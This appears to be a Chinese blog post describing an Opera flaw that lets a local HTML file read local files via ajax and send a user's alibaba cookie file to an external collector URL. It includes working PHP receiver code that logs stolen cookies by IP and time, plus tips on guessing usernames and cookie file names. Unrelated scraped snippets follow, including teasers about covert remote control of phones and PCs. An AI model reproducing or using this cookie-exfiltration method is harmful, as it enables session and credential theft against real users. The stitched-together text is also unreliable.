空虚浪子心 这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。ff3没有这个漏洞。不废话,看代码吧。利用方式如下:这段代码保存为本地htm文件,然后使用opera打开。将会把本地用户名为administrator在alibaba的cookie,发送到http://www.inbreak.net/kxlzxtest/testxss/a.php a.htm 代码 a.php代码: a.php 代码 <?php $user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; $user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"]; $fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb"); fwrite($fp,$_GET["cookie"]); fclose($fp); ?> a.php会按照 IP+时间+cookie.txt 格式生成一个txt文件。例如:121.0.29.2252009-01-05 11:55:02cookie.txt里面保存着administrator@alibaba[1].txt的内容。几点说明:1,cookie文件是IE的,比较XX,但是有很多人都会IE和opera混用。2,必须预测本地用户名,不过很多人都是administrator。3,必须预测cookie文件名。这个可以取一些常用网站的,反正ajax是异步,你可以同时调用几个 *** 。4,或者你可以发送任何本地TXT文件。opera可能说这是特性?不知道了,反正FF3没这个漏洞,使用这种方式会报错访问拒绝。
云顶之弈10.9装备合成是很多玩家关注的重点,本次就为大家带来了云顶之弈10.9装备合成图,也是最新10.9装备合成表一览,还不知道的朋友可以参考,希望能帮到大家。 10.9装备合成图 装备调...
本文目录一览: 1、手机在黑屏状态下如何远程利用其它手机或者电脑进行唤醒控制? 2、手机如何远程控制电脑呢? 3、什么远程控制软件最好用?要被控电脑没有任何知觉 手机在黑屏状态下如何远程利用...
本文导读目录: 1、什么是黑客 ? 2、黑客指的是什么,他们一般都干什么? 3、黑客是什么意思 4、黑客是什么意思? 5、什么是黑客? 6、黑客指的是什么? 7、什么是黑客?...
马云说过:“推荐好东西给别人,不要太低三下四的委屈自己,能合作就合作,不能合作就下一个。 这是个合作共赢的年代,你若信任我,三言两语就可成交;你若不信任我,说的再多也是徒劳。️ 淘宝、京东、拼...
ios14快捷指令大全 1、第一步:在“快捷指令”中创建文件夹我们可以将拨打电话、发送信息等指令放置到一个文件夹中,更便于查找:打开“快捷指令”应用,在“我的快捷指令”标签页中,点击左上方显示为蓝色的...
本文目录一览: 1、手机怎么远程控制另一个手机 2、手机如何远程控制手机 3、如何用一台手机控制另一台手机? 4、如何用手机控制手机? 手机怎么远程控制另一个手机 手机远程控制另一个手机...